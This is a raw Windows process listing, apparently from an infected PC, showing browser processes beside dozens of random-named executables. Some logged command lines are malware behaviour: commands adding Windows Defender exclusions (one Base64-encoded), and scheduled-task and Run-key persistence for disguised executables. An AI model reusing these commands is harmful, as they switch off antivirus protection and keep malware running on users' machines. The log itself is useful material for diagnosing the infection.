BrowserHost.exe" chrome-extension://fheoggkfdfchfphceeifdbepaooicaho/ --parent-
window=0
===============
ID: 22772, Name: chrome.exe, CommandLine: "C:\Program Files (x86)\Google\Chrome\
Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService
--lang=es-419 --service-sandbox-type=audio --mojo-platform-channel-handle=3492 --
field-trial-handle=2064,i,7741522595699167436,8666959540695824112,131072
/prefetch:8
===============
ID: 28016, Name: msedge.exe, CommandLine: "C:\Program Files (x86)\Microsoft\Edge\
Application\msedge.exe" --flag-switches-begin --flag-switches-end --no-startup-
window /prefetch:5
===============
ID: 27584, Name: msedge.exe, CommandLine: "C:\Program Files (x86)\Microsoft\Edge\
Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\usuario\
AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-
annotation=ptype=crashpad-handler "--database=C:\Users\usuario\AppData\Local\
Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\usuario\AppData\Local\
Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --
annotation=chromium-version=105.0.5195.127 "--annotation=exe=C:\Program Files
(x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--
annotation=prod=Microsoft Edge" --annotation=ver=105.0.1343.42 --initial-client-
data=0x10c,0x110,0x114,0xec,0x1ac,0x7ffc75445850,0x7ffc75445860,0x7ffc75445870
===============
ID: 23000, Name: msedge.exe, CommandLine: "C:\Program Files (x86)\Microsoft\Edge\
Application\msedge.exe" --type=gpu-process --gpu-
preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAA
AOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-
handle=2076 --field-trial-
handle=2228,i,4499709946258424554,4730033275178688628,131072 /prefetch:2
===============
ID: 30104, Name: msedge.exe, CommandLine: "C:\Program Files (x86)\Microsoft\Edge\
Application\msedge.exe" --type=utility --utility-sub-
type=network.mojom.NetworkService --lang=es-419 --service-sandbox-type=none --mojo-
platform-channel-handle=2272 --field-trial-
handle=2228,i,4499709946258424554,4730033275178688628,131072 /prefetch:3
===============
ID: 29728, Name: msedge.exe, CommandLine: "C:\Program Files (x86)\Microsoft\Edge\
Application\msedge.exe" --type=utility --utility-sub-
type=storage.mojom.StorageService --lang=es-419 --service-sandbox-type=utility --
mojo-platform-channel-handle=2640 --field-trial-
handle=2228,i,4499709946258424554,4730033275178688628,131072 /prefetch:8
===============
ID: 31012, Name: msedge.exe, CommandLine: "C:\Program Files (x86)\Microsoft\Edge\
Application\msedge.exe" --type=utility --utility-sub-
type=password_manager.breach_detection.mojom.EdgePasswordDataProcessor --lang=es-
419 --service-sandbox-type=utility --mojo-platform-channel-handle=1600 --field-
trial-handle=2228,i,4499709946258424554,4730033275178688628,131072 /prefetch:8
===============
ID: 26204, Name: chrome.exe, CommandLine: "C:\Program Files (x86)\Google\Chrome\
Application\chrome.exe" --type=renderer --display-capture-permissions-policy-
allowed --lang=es-419 --device-scale-factor=1 --num-raster-threads=1 --renderer-
client-id=58 --time-ticks-at-unix-epoch=-1681672103653583 --launch-time-
ticks=256496037006 --mojo-platform-channel-handle=5612 --field-trial-
handle=2064,i,7741522595699167436,8666959540695824112,131072 /prefetch:1
===============
ID: 32044, Name: chrome.exe, CommandLine: "C:\Program Files (x86)\Google\Chrome\
Application\chrome.exe" --type=renderer --display-capture-permissions-policy-
allowed --lang=es-419 --device-scale-factor=1 --num-raster-threads=1 --renderer-
client-id=64 --time-ticks-at-unix-epoch=-1681672103653583 --launch-time-
ticks=256647299634 --mojo-platform-channel-handle=4848 --field-trial-
handle=2064,i,7741522595699167436,8666959540695824112,131072 /prefetch:1
===============
ID: 32692, Name: chrome.exe, CommandLine: "C:\Program Files (x86)\Google\Chrome\
Application\chrome.exe" --type=renderer --display-capture-permissions-policy-
allowed --lang=es-419 --device-scale-factor=1 --num-raster-threads=1 --renderer-
client-id=66 --time-ticks-at-unix-epoch=-1681672103653583 --launch-time-
ticks=256654677188 --mojo-platform-channel-handle=5192 --field-trial-
handle=2064,i,7741522595699167436,8666959540695824112,131072 /prefetch:1
===============
ID: 31492, Name: chrome.exe, CommandLine: "C:\Program Files (x86)\Google\Chrome\
Application\chrome.exe" --type=renderer --display-capture-permissions-policy-
allowed --lang=es-419 --device-scale-factor=1 --num-raster-threads=1 --renderer-
client-id=71 --time-ticks-at-unix-epoch=-1681672103653583 --launch-time-
ticks=256671420296 --mojo-platform-channel-handle=5820 --field-trial-
handle=2064,i,7741522595699167436,8666959540695824112,131072 /prefetch:1
===============
ID: 31728, Name: chrome.exe, CommandLine: "C:\Program Files (x86)\Google\Chrome\
Application\chrome.exe" --type=renderer --display-capture-permissions-policy-
allowed --lang=es-419 --device-scale-factor=1 --num-raster-threads=1 --renderer-
client-id=72 --time-ticks-at-unix-epoch=-1681672103653583 --launch-time-
ticks=256671853225 --mojo-platform-channel-handle=1640 --field-trial-
handle=2064,i,7741522595699167436,8666959540695824112,131072 /prefetch:1
===============
ID: 30964, Name: smartscreen.exe, CommandLine: C:\Windows\System32\smartscreen.exe
-Embedding
===============
ID: 31960, Name: chrome.exe, CommandLine: "C:\Program Files (x86)\Google\Chrome\
Application\chrome.exe" --type=renderer --display-capture-permissions-policy-
allowed --lang=es-419 --device-scale-factor=1 --num-raster-threads=1 --renderer-
client-id=74 --time-ticks-at-unix-epoch=-1681672103653583 --launch-time-
ticks=256704518338 --mojo-platform-channel-handle=6684 --field-trial-
handle=2064,i,7741522595699167436,8666959540695824112,131072 /prefetch:1
===============
ID: 29480, Name: WinRAR.exe, CommandLine: "C:\Program Files\WinRAR\WinRAR.exe" "C:\
Users\usuario\Downloads\File.7z"
===============
ID: 30800, Name: PXm4WEFjtA_1sDb1cI22p0Qy.exe, CommandLine: "C:\Users\usuario\
Pictures\Minor Policy\PXm4WEFjtA_1sDb1cI22p0Qy.exe"
===============
ID: 30232, Name: aSv5jWu4Et1psm6MDp17yUgI.exe, CommandLine: "C:\Users\usuario\
Pictures\Minor Policy\aSv5jWu4Et1psm6MDp17yUgI.exe"
===============
ID: 24100, Name: 9oLffSy8FP46v9leLGnqUAdi.exe, CommandLine: "C:\Users\usuario\
Pictures\Minor Policy\9oLffSy8FP46v9leLGnqUAdi.exe"
===============
ID: 11196, Name: ki218682.exe, CommandLine: C:\Users\usuario\AppData\Local\Temp\
IXP000.TMP\ki218682.exe
===============
ID: 31380, Name: ki226728.exe, CommandLine: C:\Users\usuario\AppData\Local\Temp\
IXP001.TMP\ki226728.exe
===============
ID: 25692, Name: ki805887.exe, CommandLine: C:\Users\usuario\AppData\Local\Temp\
IXP002.TMP\ki805887.exe
===============
ID: 20016, Name: ki308070.exe, CommandLine: C:\Users\usuario\AppData\Local\Temp\
IXP003.TMP\ki308070.exe
===============
ID: 33372, Name: csgo.exe, CommandLine: "C:\Program Files (x86)\Steam\steamapps\
common\Counter-Strike Global Offensive\csgo.exe" -steam
===============
ID: 33640, Name: 25RDBqzXvxhBSbf7DXIQa7NM.exe, CommandLine: "C:\Users\usuario\
Pictures\Minor Policy\25RDBqzXvxhBSbf7DXIQa7NM.exe"
===============
ID: 33648, Name: bs6mZ0nMyiZQ26p7F2HzaU6U.exe, CommandLine: "C:\Users\usuario\
Pictures\Minor Policy\bs6mZ0nMyiZQ26p7F2HzaU6U.exe"
===============
ID: 33656, Name: 8ZCErKNOXLgSDsCfSlij4DqA.exe, CommandLine: "C:\Users\usuario\
Pictures\Minor Policy\8ZCErKNOXLgSDsCfSlij4DqA.exe"
===============
ID: 33664, Name: ugZ7xUURpx8kpWnOOdSsCYfT.exe, CommandLine: "C:\Users\usuario\
Pictures\Minor Policy\ugZ7xUURpx8kpWnOOdSsCYfT.exe"
===============
ID: 32020, Name: AppLaunch.exe, CommandLine: "C:\\Windows\\Microsoft.NET\\
Framework\\v4.0.30319\\AppLaunch.exe"
===============
ID: 33128, Name: msfeedssync.exe, CommandLine: C:\Windows\system32\msfeedssync.exe
sync
===============
ID: 29292, Name: ss31.exe, CommandLine: "C:\Users\usuario\AppData\Local\Temp\
ss31.exe"
===============
ID: 32420, Name: ZZpmfDkgpO8SkXgneLOcwcl6.exe, CommandLine: "C:\Users\usuario\
Pictures\Minor Policy\ZZpmfDkgpO8SkXgneLOcwcl6.exe"
===============
ID: 30840, Name: uyQCgtyEW1opCFJTj35sr22z.exe, CommandLine: "C:\Users\usuario\
Pictures\Minor Policy\uyQCgtyEW1opCFJTj35sr22z.exe"
===============
ID: 33760, Name: 4Hj9k71oR6U4pkzK_wvK7UkB.exe, CommandLine: "C:\Users\usuario\
Pictures\Minor Policy\4Hj9k71oR6U4pkzK_wvK7UkB.exe"
===============
ID: 33184, Name: AppLaunch.exe, CommandLine: "C:\\Windows\\Microsoft.NET\\
Framework\\v4.0.30319\\AppLaunch.exe"
===============
ID: 28344, Name: Install.exe, CommandLine: .\Install.exe
===============
ID: 22968, Name: Install.exe, CommandLine: .\Install.exe /S /site_id "525403"
===============
ID: 30956, Name: EJQC6ecu9h.exe, CommandLine: "C:\Users\usuario\AppData\Roaming\
KlTtYHyHOa6\EJQC6ecu9h.exe" --Admin IsNotAutoStart IsNotTask
===============
ID: 22600, Name: backgroundTaskHost.exe, CommandLine: "C:\WINDOWS\system32\
backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
===============
ID: 21916, Name: oneetx.exe, CommandLine: "C:\Users\usuario\AppData\Local\Temp\
10180c8ca3\oneetx.exe"
===============
ID: 34148, Name: node.exe, CommandLine: node.exe node.lib 3956101466505 1928975631
===============
ID: 34212, Name: 688A.exe, CommandLine: "C:\Users\usuario\AppData\Local\Temp\
688A.exe" --Admin IsNotAutoStart IsNotTask
===============
ID: 33632, Name: build2.exe, CommandLine: "C:\Users\usuario\AppData\Local\3cc18b03-
2ef6-40e5-9c25-191d7c1fba7a\build2.exe"
===============
ID: 27564, Name: build2.exe, CommandLine: "C:\Users\usuario\AppData\Local\6c712fc4-
3d05-40c0-820c-4bf6c7ac5fd7\build2.exe"
===============
ID: 33924, Name: gRBrlCK.exe, CommandLine: "C:\Users\usuario\AppData\Roaming\
A4tmSbJUZNs\gRBrlCK.exe"
===============
ID: 33868, Name: IGCC.exe, CommandLine: "C:\Program Files\WindowsApps\
AppUp.IntelGraphicsExperience_1.100.3408.0_x64__8j3eq9eme6ctt\IGCC.exe" -
ServerName:App.AppXxq4ar3drev924dxqnatpa4s48c4zrxd1.mca
===============
ID: 28116, Name: bu453998.exe, CommandLine: C:\Users\usuario\AppData\Local\Temp\
IXP004.TMP\bu453998.exe
===============
ID: 34000, Name: 9DD8.exe, CommandLine: "C:\Users\usuario\AppData\Local\Temp\
9DD8.exe" --Admin IsNotAutoStart IsNotTask
===============
ID: 33300, Name: 99D0.exe, CommandLine: "C:\Users\usuario\AppData\Local\Temp\
99D0.exe" --Admin IsNotAutoStart IsNotTask
===============
ID: 31568, Name: powershell.exe, CommandLine: C:\WINDOWS\System32\
WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath
@($env:UserProfile, $env:ProgramFiles) -Force
===============
ID: 27248, Name: conhost.exe, CommandLine: \??\C:\WINDOWS\system32\conhost.exe 0x4
===============
ID: 34624, Name: ZKLRkuoVGDbkA5t8TPfQz_PQ.exe, CommandLine: "C:\Users\usuario\
Pictures\Minor Policy\ZKLRkuoVGDbkA5t8TPfQz_PQ.exe"
===============
ID: 34648, Name: VzARbluXWuUf0OH30Qt76n75.exe, CommandLine: "C:\Users\usuario\
Pictures\Minor Policy\VzARbluXWuUf0OH30Qt76n75.exe"
===============
ID: 34684, Name: 5_jQHaxjVebVFwRL4PH5PIz2.exe, CommandLine: "C:\Users\usuario\
Pictures\Minor Policy\5_jQHaxjVebVFwRL4PH5PIz2.exe"
===============
ID: 33476, Name: _JaAk2ybrEXX0v8vLMLFpG3a.exe, CommandLine: "C:\Users\usuario\
Pictures\Minor Policy\_JaAk2ybrEXX0v8vLMLFpG3a.exe"
===============
ID: 34308, Name: _XCo87uS0qd9A1lyYHzVozu6.exe, CommandLine: "C:\Users\usuario\
Pictures\Minor Policy\_XCo87uS0qd9A1lyYHzVozu6.exe"
===============
ID: 33688, Name: EQI2Eb7SoqRS6VXt4enVT_xO.exe, CommandLine: "C:\Users\usuario\
Pictures\Minor Policy\EQI2Eb7SoqRS6VXt4enVT_xO.exe"
===============
ID: 32852, Name: ciBd4tiq_jleSzWzLjOFI7hZ.exe, CommandLine: "C:\Users\usuario\
Pictures\Minor Policy\ciBd4tiq_jleSzWzLjOFI7hZ.exe"
===============
ID: 32944, Name: AppLaunch.exe, CommandLine: "C:\\Windows\\Microsoft.NET\\
Framework\\v4.0.30319\\AppLaunch.exe"
===============
ID: 31768, Name: ki240035.exe, CommandLine: C:\Users\usuario\AppData\Local\Temp\
IXP005.TMP\ki240035.exe
===============
ID: 27712, Name: build2.exe, CommandLine: "C:\Users\usuario\AppData\Local\7026e6da-
c39f-41f4-9908-bf3b913a2000\build2.exe"
===============
ID: 28252, Name: build2.exe, CommandLine: "C:\Users\usuario\AppData\Local\c60b24e6-
16a3-4df9-8525-2973fd6aeb19\build2.exe"
===============
ID: 31528, Name: AppLaunch.exe, CommandLine: "C:\\Windows\\Microsoft.NET\\
Framework\\v4.0.30319\\AppLaunch.exe"
===============
ID: 34396, Name: ki509348.exe, CommandLine: C:\Users\usuario\AppData\Local\Temp\
IXP006.TMP\ki509348.exe
===============
ID: 34948, Name: ki834237.exe, CommandLine: C:\Users\usuario\AppData\Local\Temp\
IXP007.TMP\ki834237.exe
===============
ID: 35084, Name: ki026260.exe, CommandLine: C:\Users\usuario\AppData\Local\Temp\
IXP008.TMP\ki026260.exe
===============
ID: 35112, Name: Coek3uKK.exe, CommandLine: "C:\Users\usuario\AppData\Local\Temp\
RarSFX0\Coek3uKK.exe"
===============
ID: 91272, Name: powershell.exe, CommandLine: C:\WINDOWS\System32\
WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object
Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurren
t())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator))
{ IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2")
{ schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn
'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' }
Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program
Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup)
-Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -
DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -
ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC'
-User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\
Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d
'C:\Program Files\Notepad\Chrome\updater.exe' }
===============
ID: 91336, Name: conhost.exe, CommandLine: \??\C:\WINDOWS\system32\conhost.exe 0x4
===============
ID: 91860, Name: bu053088.exe, CommandLine: C:\Users\usuario\AppData\Local\Temp\
IXP009.TMP\bu053088.exe
===============
ID: 91192, Name: mstsca.exe, CommandLine: C:\Users\usuario\AppData\Roaming\
Microsoft\Network\mstsca.exe
===============
ID: 110356, Name: 6C96.exe, CommandLine: "C:\Users\usuario\AppData\Local\Temp\
6C96.exe"
===============
ID: 112680, Name: jsc.exe, CommandLine: "C:\Windows\Microsoft.NET\Framework64\
v4.0.30319\jsc.exe"
===============
ID: 119320, Name: powershell.exe, CommandLine: C:\WINDOWS\System32\
WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object
Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurren
t())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator))
{ schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\
Chrome\updater.exe" }
===============
ID: 119368, Name: systeminfo.exe, CommandLine: systeminfo.exe /fo csv
===============
ID: 132348, Name: AppLaunch.exe, CommandLine: "C:\Windows\Microsoft.NET\Framework\
v4.0.30319\AppLaunch.exe"
===============
ID: 132364, Name: conhost.exe, CommandLine: \??\C:\WINDOWS\system32\conhost.exe 0x4
===============
ID: 132372, Name: taskhostw.exe, CommandLine: taskhostw.exe
===============
ID: 132508, Name: schtasks.exe, CommandLine: /C /create /F /sc minute /mo 1 /tn
"Azure-Update-Task" /tr "C:\Users\usuario\AppData\Roaming\Microsoft\Network\
mstsca.exe"
===============
ID: 132640, Name: D4C3CF00DvXNXMEfWEATK6Ox.exe, CommandLine: "C:\Users\usuario\
Pictures\Minor Policy\D4C3CF00DvXNXMEfWEATK6Ox.exe"
===============
ID: 132648, Name: wGApxRSHmLGJO4JekhNRAuf5.exe, CommandLine: "C:\Users\usuario\
Pictures\Minor Policy\wGApxRSHmLGJO4JekhNRAuf5.exe"
===============
ID: 132656, Name: CmoqYNURke2pNIkfDCRhvV9L.exe, CommandLine: "C:\Users\usuario\
Pictures\Minor Policy\CmoqYNURke2pNIkfDCRhvV9L.exe"
===============
ID: 132664, Name: EhXpyDq538kCb2CpGjnkHfSw.exe, CommandLine: "C:\Users\usuario\
Pictures\Minor Policy\EhXpyDq538kCb2CpGjnkHfSw.exe"
===============
ID: 132676, Name: cJn0ixRGPfKuuO_zVciuuZmN.exe, CommandLine: "C:\Users\usuario\
Pictures\Minor Policy\cJn0ixRGPfKuuO_zVciuuZmN.exe"
===============
ID: 132792, Name: 11.exe, CommandLine: "C:\Windows\Temp\11.exe"
===============
ID: 132880, Name: dllhost.exe, CommandLine: "C:\WINDOWS\system32\dllhost.exe"
===============
ID: 132908, Name: J0I6yR8Y31_IOnv2n2E6maWf.exe, CommandLine: "C:\Users\usuario\
Pictures\Minor Policy\J0I6yR8Y31_IOnv2n2E6maWf.exe"
===============
ID: 132924, Name: 9GLNIVqrZk2y5RJvipO_OPOE.exe, CommandLine: "C:\Users\usuario\
Pictures\Minor Policy\9GLNIVqrZk2y5RJvipO_OPOE.exe"
===============
ID: 132948, Name: 22.exe, CommandLine: "C:\Windows\Temp\22.exe"
===============
ID: 133080, Name: is-5BF07.tmp, CommandLine: "C:\Users\usuario\AppData\Local\Temp\
is-0MD42.tmp\is-5BF07.tmp" /SL4 $4E0952 "C:\Users\usuario\Pictures\Minor Policy\
cJn0ixRGPfKuuO_zVciuuZmN.exe" 2562561 56320
===============
ID: 133112, Name: 123.exe, CommandLine: "C:\Windows\Temp\123.exe"
===============
ID: 27340, Name: wNpalt, CommandLine: C:\Users\usuario\AppData\Local\Temp\
sihEZnOegyfaETYZCu\wNpalt /mixtwo
===============
ID: 5632, Name: RegSvcs.exe, CommandLine: "C:\Windows\Microsoft.NET\Framework\
v4.0.30319\RegSvcs.exe"
===============
ID: 103012, Name: WerFault.exe, CommandLine: C:\WINDOWS\SysWOW64\WerFault.exe -u -p
132792 -s 280
===============
ID: 107576, Name: RegSvcs.exe, CommandLine: "C:\Windows\Microsoft.NET\Framework\
v4.0.30319\RegSvcs.exe"
===============
ID: 26084, Name: 321.exe, CommandLine: "C:\Windows\Temp\321.exe"
===============
ID: 33872, Name: cmd.exe, CommandLine: cmd.exe /d /c bwsjhihxsxf.bat 3956101466505
===============
ID: 34492, Name: WerFault.exe, CommandLine: C:\WINDOWS\SysWOW64\WerFault.exe -u -p
132948 -s 292
===============
ID: 35404, Name: conhost.exe, CommandLine: \??\C:\WINDOWS\system32\conhost.exe 0x4
===============
ID: 35428, Name: conhost.exe, CommandLine: \??\C:\WINDOWS\system32\conhost.exe 0x4
===============
ID: 35580, Name: RegSvcs.exe, CommandLine: "C:\Windows\Microsoft.NET\Framework\
v4.0.30319\RegSvcs.exe"
===============
ID: 35680, Name: WerFault.exe, CommandLine: C:\WINDOWS\SysWOW64\WerFault.exe -u -p
133112 -s 280
===============
ID: 35760, Name: AppLaunch.exe, CommandLine: "C:\\Windows\\Microsoft.NET\\
Framework\\v4.0.30319\\AppLaunch.exe"
===============
ID: 33944, Name: Install.exe, CommandLine: .\Install.exe
===============
ID: 34108, Name: Rec419.exe, CommandLine: "C:\Program Files (x86)\FKDsoftFR\Rec419\
Rec419.exe"
===============
ID: 35860, Name: oneetx.exe, CommandLine: C:\Users\usuario\AppData\Local\Temp\
10180c8ca3\oneetx.exe
===============
ID: 35956, Name: Install.exe, CommandLine: .\Install.exe /S /site_id "525403"
===============
ID: 35972, Name: ju6G8sJ0.exe, CommandLine: "C:\Users\usuario\AppData\Roaming\
ruIvbnl\ju6G8sJ0.exe"
===============
ID: 36336, Name: pKoLxd, CommandLine: C:\Users\usuario\AppData\Local\Temp\
nQfsPRITKCJxBJKOVa\pKoLxd
===============
ID: 36360, Name: forfiles.exe, CommandLine: "C:\Windows\System32\forfiles.exe" /p
c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\
Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0
/reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\
Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
===============
ID: 36404, Name: cmd.exe, CommandLine: "cmd.exe" /C powershell -EncodedCommand
"PAAjAHAAZQBqAEgAVgBIACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMATg
BhADAAQQAxADAAcQBLAHgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuA
HYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkA
IAA8ACMAWgBBADcAVQBDAEgAVQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBVAGwATgBwAFIAdQBjAHQAcQA
zACMAPgA=" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-
dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 &
powercfg /hibernate off
